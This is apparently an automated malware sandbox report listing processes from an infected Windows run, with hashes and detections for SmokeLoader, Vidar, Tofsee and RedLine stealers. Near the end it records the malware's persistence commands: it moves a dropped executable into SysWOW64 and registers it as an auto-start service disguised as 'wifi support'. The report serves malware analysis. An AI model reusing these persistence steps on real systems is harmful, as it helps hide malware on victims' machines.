                                                                                                        General

                                                                                                         Start time: 20:22:20
                                                                                                         Start date: 14/01/2022
                                                                                                         Path: C:\Windows\System32\svchost.exe
                                                                                                         Wow64 process (32bit): false
                                                                                                         Commandline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                         Imagebase: 0x7ff70d6e0000
                                                                                                         File size: 51288 bytes
                                                                                                         MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
                                                                                                         Has elevated privileges: true
                                                                                                         Has administrator privileges: false
                                                                                                         Programmed in: C, C++ or other language
                                                                                                         Reputation: high

                                                                                                        General

                                                                                                         Start time: 20:22:20
                                                                                                         Start date: 14/01/2022
                                                                                                         Path: C:\Windows\System32\svchost.exe
                                                                                                         Wow64 process (32bit): false
                                                                                                         Commandline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                         Imagebase: 0x7ff70d6e0000
                                                                                                         File size: 51288 bytes
                                                                                                         MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
                                                                                                         Has elevated privileges: true
                                                                                                         Has administrator privileges: false
                                                                                                         Programmed in: C, C++ or other language
                                                                                                         Reputation: high

                                                                                                        General

                                                                                                         Start time: 20:22:21
                                                                                                         Start date: 14/01/2022
                                                                                                         Path: C:\Windows\System32\svchost.exe
                                                                                                         Wow64 process (32bit): false
                                                                                                         Commandline: C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                         Imagebase: 0x7ff70d6e0000
                                                                                                         File size: 51288 bytes
                                                                                                         MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
                                                                                                         Has elevated privileges: true
                                                                                                         Has administrator privileges: false
                                                                                                         Programmed in: C, C++ or other language
                                                                                                         Reputation: high

                                                                                                        General

                                                                                                         Start time: 20:22:22
                                                                                                         Start date: 14/01/2022
                                                                                                         Path: C:\Windows\System32\SgrmBroker.exe
                                                                                                         Wow64 process (32bit): false
                                                                                                         Commandline: C:\Windows\system32\SgrmBroker.exe
                                                                                                         Imagebase: 0x7ff657f80000
                                                                                                         File size: 163336 bytes
                                                                                                         MD5 hash: D3170A3F3A9626597EEE1888686E3EA6
                                                                                                         Has elevated privileges: true
                                                                                                         Has administrator privileges: true
                                                                                                         Programmed in: C, C++ or other language
                                                                                                         Reputation: high

                                                                                                        General

                                                                                                         Start time: 20:22:22
                                                                                                         Start date: 14/01/2022
                                                                                                         Path: C:\Windows\System32\svchost.exe
                                                                                                         Wow64 process (32bit): false
                                                                                                         Commandline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                         Imagebase: 0x7ff70d6e0000
                                                                                                         File size: 51288 bytes
                                                                                                         MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
                                                                                                         Has elevated privileges: true
                                                                                                         Has administrator privileges: false
                                                                                                         Programmed in: C, C++ or other language
                                                                                                         Reputation: high

                                                                                                        General

                                                                                                         Start time: 20:22:22
                                                                                                         Start date: 14/01/2022
                                                                                                         Path: C:\Windows\System32\svchost.exe
                                                                                                         Wow64 process (32bit): false
                                                                                                         Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                         Imagebase: 0x7ff70d6e0000
                                                                                                         File size: 51288 bytes
                                                                                                         MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
                                                                                                         Has elevated privileges: true
                                                                                                         Has administrator privileges: true
                                                                                                         Programmed in: C, C++ or other language
                                                                                                         Reputation: high

                                                                                                        General

                                                                                                         Start time: 20:22:26
                                                                                                         Start date: 14/01/2022
                                                                                                         Path: C:\Windows\explorer.exe
                                                                                                         Wow64 process (32bit): false
                                                                                                         Commandline: C:\Windows\Explorer.EXE
                                                                                                         Imagebase: 0x7ff720ea0000
                                                                                                         File size: 3933184 bytes
                                                                                                         MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                         Has elevated privileges: false
                                                                                                         Has administrator privileges: false
                                                                                                         Programmed in: C, C++ or other language
                                                                                                         Yara matches:
                                                                                                         • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000000.327467083.0000000005AC1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                         Reputation: high

                                                                                                        General

                                                                                                         Start time: 20:22:44
                                                                                                         Start date: 14/01/2022
                                                                                                         Path: C:\Windows\System32\svchost.exe
                                                                                                         Wow64 process (32bit): false
                                                                                                         Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                         Imagebase: 0x7ff70d6e0000
                                                                                                         File size: 51288 bytes
                                                                                                         MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
                                                                                                         Has elevated privileges: true
                                                                                                         Has administrator privileges: true
                                                                                                         Programmed in: C, C++ or other language
                                                                                                         Reputation: high

                                                                                                        General

                                                                                                         Start time: 20:22:58
                                                                                                         Start date: 14/01/2022
                                                                                                         Path: C:\Windows\System32\svchost.exe
                                                                                                         Wow64 process (32bit): false
                                                                                                         Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                         Imagebase: 0x7ff70d6e0000
                                                                                                         File size: 51288 bytes
                                                                                                         MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
                                                                                                         Has elevated privileges: true
                                                                                                         Has administrator privileges: true
                                                                                                         Programmed in: C, C++ or other language
                                                                                                         Reputation: high

                                                                                                        General

                                                                                                         Start time: 20:22:59
                                                                                                         Start date: 14/01/2022
                                                                                                         Path: C:\Users\user\AppData\Roaming\rcvfbte
                                                                                                         Wow64 process (32bit): true
                                                                                                         Commandline: C:\Users\user\AppData\Roaming\rcvfbte
                                                                                                         Imagebase: 0x400000
                                                                                                         File size: 320000 bytes
                                                                                                         MD5 hash: 679831CF1F00950B4ADFFBBBA7E6AB46
                                                                                                         Has elevated privileges: false
                                                                                                         Has administrator privileges: false
                                                                                                         Programmed in: C, C++ or other language
                                                                                                         Antivirus matches:
                                                                                                         • Detection: 100%, Joe Sandbox ML
                                                                                                         Reputation: low

                                                                                                        General

                                                                                                         Start time: 20:23:01
                                                                                                         Start date: 14/01/2022
                                                                                                         Path: C:\Users\user\AppData\Roaming\rcvfbte
                                                                                                         Wow64 process (32bit): true
                                                                                                         Commandline: C:\Users\user\AppData\Roaming\rcvfbte
                                                                                                         Imagebase: 0x400000
                                                                                                         File size: 320000 bytes
                                                                                                         MD5 hash: 679831CF1F00950B4ADFFBBBA7E6AB46
                                                                                                         Has elevated privileges: false
                                                                                                         Has administrator privileges: false
                                                                                                         Programmed in: C, C++ or other language
                                                                                                         Yara matches:
                                                                                                         • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.385289105.0000000000530000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                         • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.385864770.0000000002441000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                         Reputation: low

                                                                                                        General

                                                                                                        Start time:20:23:04
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\9460.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\9460.exe
                                                                                                        Imagebase:0x400000
                                                                                                        File size:301056 bytes
                                                                                                        MD5 hash:277680BD3182EB0940BC356FF4712BEF
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        • Detection: 46%, Metadefender, Browse
                                                                                                        • Detection: 77%, ReversingLabs
                                                                                                        Reputation:moderate

                                                                                                        General

                                                                                                        Start time:20:23:07
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\A019.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\A019.exe
                                                                                                        Imagebase:0x400000
                                                                                                        File size:320000 bytes
                                                                                                        MD5 hash:679831CF1F00950B4ADFFBBBA7E6AB46
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        • Detection: 47%, ReversingLabs

                                                                                                        General

                                                                                                        Start time:20:23:07
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                        Imagebase:0x7ff70d6e0000
                                                                                                        File size:51288 bytes
                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        General

                                                                                                        Start time:20:23:08
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6608 -ip 6608
                                                                                                        Imagebase:0x7ff70d6e0000
                                                                                                        File size:434592 bytes
                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        General

                                                                                                        Start time:20:23:09
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\A019.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\A019.exe
                                                                                                        Imagebase:0x400000
                                                                                                        File size:320000 bytes
                                                                                                        MD5 hash:679831CF1F00950B4ADFFBBBA7E6AB46
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000014.00000002.407171768.00000000005C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000014.00000002.407257194.00000000005E1000.00000004.00020000.sdmp, Author: Joe Security

                                                                                                        General

                                                                                                        Start time:20:23:10
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6608 -s 520
                                                                                                        Imagebase:0xdd0000
                                                                                                        File size:434592 bytes
                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        General

                                                                                                        Start time:20:23:12
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\9779.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\9779.exe
                                                                                                        Imagebase:0x400000
                                                                                                        File size:324608 bytes
                                                                                                        MD5 hash:043B44289E31BD54357F9A5C21833259
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.398828451.0000000000899000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000016.00000002.398828451.0000000000899000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Joe Sandbox ML

                                                                                                        General

                                                                                                        Start time:20:23:14
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                        Imagebase:0x7ff70d6e0000
                                                                                                        File size:51288 bytes
                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        General

                                                                                                        Start time:20:23:15
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\A881.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\A881.exe
                                                                                                        Imagebase:0x400000
                                                                                                        File size:321024 bytes
                                                                                                        MD5 hash:9AF71C74219794F100EA801B528339AF
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001A.00000002.443373510.00000000006C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001A.00000002.443196839.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001A.00000003.404265838.00000000007F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Joe Sandbox ML

                                                                                                        General

                                                                                                        Start time:20:23:18
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\B217.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\B217.exe
                                                                                                        Imagebase:0xa90000
                                                                                                        File size:537088 bytes
                                                                                                        MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001B.00000002.479069139.0000000003E01000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001B.00000002.481840914.0000000004005000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001B.00000002.480913132.0000000003F71000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML

                                                                                                        General

                                                                                                        Start time:20:23:23
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                        Imagebase:0x7ff7c6120000
                                                                                                        File size:455656 bytes
                                                                                                        MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        General

                                                                                                        Start time:20:23:23
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7f20f0000
                                                                                                        File size:625664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        General

                                                                                                        Start time:20:23:23
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\SysWOW64\cmd.exe" /C mkdir C:\Windows\SysWOW64\gebcmxiz\
                                                                                                        Imagebase:0xd80000
                                                                                                        File size:232960 bytes
                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        General

                                                                                                        Start time:20:23:24
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7f20f0000
                                                                                                        File size:625664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        General

                                                                                                        Start time:20:23:26
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lnagngtg.exe" C:\Windows\SysWOW64\gebcmxiz\
                                                                                                        Imagebase:0xd80000
                                                                                                        File size:232960 bytes
                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                        Has elevated privileges:true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 20:23:27
Start date: 14/01/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7f20f0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 20:23:32
Start date: 14/01/2022
Path: C:\Users\user\AppData\Local\Temp\B217.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\AppData\Local\Temp\B217.exe
Imagebase: 0x1b0000
File size: 537088 bytes
MD5 hash: D7DF01D8158BFADDC8BA48390E52F355
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language

General

Start time: 20:23:32
Start date: 14/01/2022
Path: C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\sc.exe" create gebcmxiz binPath= "C:\Windows\SysWOW64\gebcmxiz\lnagngtg.exe /d\"C:\Users\user\AppData\Local\Temp\A881.exe\"" type= own start= auto DisplayName= "wifi support
Imagebase: 0xa70000
File size: 60928 bytes
MD5 hash: 24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 20:23:33
Start date: 14/01/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7f20f0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Disassembly

Code Analysis
